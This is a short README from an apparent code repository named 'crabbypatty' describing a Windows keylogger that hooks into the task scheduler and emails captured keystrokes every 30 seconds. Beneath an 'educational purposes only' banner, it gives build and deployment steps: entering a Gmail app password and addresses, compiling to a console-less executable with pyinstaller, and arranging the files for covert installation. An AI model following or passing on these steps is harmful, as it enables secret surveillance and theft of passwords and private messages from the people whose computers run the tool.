jackloldavis89/crabbypatty/readme.txt

 !!!!FOR EDUCATIONAL PURPOSES ONLY!!!!

+A keylogger that latches onto the windows scheduler and emails keys written every 30 seconds.

 Step 1.
 Edit main.py changing the app_password (you can find this in your gmail settings), email_to, and email_from.
 Step 2.
 Make main.py into an executable (.exe) with the console command "pyinstaller main.py --noconsole" Step 3.
 Add every folder but "hooksin.bat" to a new directory named "cache"